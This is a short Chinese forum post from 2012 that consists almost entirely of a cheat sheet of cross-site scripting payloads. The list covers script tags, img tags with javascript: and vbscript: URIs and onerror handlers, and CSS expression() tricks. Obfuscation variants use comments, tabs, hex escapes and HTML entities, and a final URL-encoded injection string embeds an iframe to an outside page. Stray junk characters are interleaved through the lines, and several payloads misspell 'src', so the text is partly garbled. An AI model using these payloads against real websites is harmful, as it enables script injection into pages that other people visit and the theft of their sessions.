<script>alert("跨站")</script> (最常用)4 z$ J1 X% v* w% C5 _8 ?) _1 ^! c
<img scr=javascript:alert("跨站")></img>! c G6 M" P2 J; @2 O
<img scr="javascript: alert(/跨站/)></img>
, x) w5 c. t2 v8 q6 A<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)1 r& d' o B9 U9 B" j( F8 O+ [9 ]0 H% J
<img scr="#" onerror=alert(/跨站/)></img>
( ^* c) v$ X; J% V! a<img scr="#" style="xss:expression(alert(/xss/));"></img>
/ |% Y1 E& ? u7 h0 w0 T/ L<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)+ @* ~/ X" m+ a5 w9 H+ u
<img src=vbscript:msgbox ("xss")></img>
C! H4 X/ t4 F, a# Z* [<style> input {left:expression (alert('xss'))}</style>8 {* M8 x) M' B3 V% \
<div style={left:expression (alert('xss'))}></div>
5 C% z/ s" l4 v8 h1 V- X# w, E<div style={left:exp/* */ression (alert('xss'))}></div>6 H5 \6 v" d, U8 U$ q+ Z+ ^
<div style={left:\0065\0078ression (alert('xss'))}></div>5 A' {0 f* d9 @. g7 @
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
3 G& {/ R3 g: ~$ funicode <div style="{left:expRessioN (alert('xss'))}">
! l+ l) ?( M& Z) t' o7 w4 Q6 c- ]1 P( X- Y' R( {. Q3 r
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["' ?6 a: ?+ d( R, Z/ A2 U2 h# C" w+ D
|
发表于 2012-9-13 17:15:04
收藏
支持
反对